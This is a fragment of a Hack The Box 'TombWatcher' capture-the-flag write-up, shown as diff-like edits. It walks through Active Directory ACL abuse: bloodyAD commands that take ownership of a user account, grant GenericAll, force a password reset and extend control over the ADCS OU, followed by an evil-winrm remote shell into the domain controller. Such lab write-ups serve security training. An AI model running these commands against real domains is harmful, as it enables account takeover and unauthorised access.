HTB - TombWatcher

 1 | $ nxc smb 10.10.11.72 -u sam -p 's@m_123' |

-had WriteOwner
+sam had WriteOwner over john

-We could abuse that ACL by first becoming owner of that john
+We could abuse that ACL by first becoming owner of that john domain account.

 1 | $ bloodyAD -u 'sam' -p 's@m_123' -d tombwatcher.htb --dc-ip 10.10.11.72 set owner john sam |

-attributes which could allow in the next step to force change his password.
+Then, as owner, we could add GenericAll DACL over john attributes which could allow in the next step to force change his password.

 1 | $ bloodyAD -u 'sam' -p 's@m_123' -d tombwatcher.htb --dc-ip 10.10.11.72 add genericAll john sam |

-We then changed john
+We then changed john password as sam.

 1 | $ bloodyAD -u 'sam' -p 's@m_123' -d tombwatcher.htb --dc-ip 10.10.11.72 set password john 'j0hn_123' |

-is member of the Remote Management Users
+We can see that john is member of the Remote Management Users over DC01.

 Shell as john

-and get the flag under the Desktop folder.
+As john, we could PsRemote into DC01 and get the flag under the Desktop folder.

 1 | $ evil-winrm -i 10.10.11.72 -u john -p 'j0hn_123' |

-Furthermore, going back to the enumeration data from bloodhound, we can see that john
+Furthermore, going back to the enumeration data from bloodhound, we can see that john had GenericAll over the ADCS OU.
+We could abuse that ACL using bloodyAD.

 1 | $ bloodyAD -u john -p 'j0hn_123' --dc-ip 10.10.11.72 add genericAll 'OU=ADCS,DC=TOMBWATCHER,DC=HTB' john |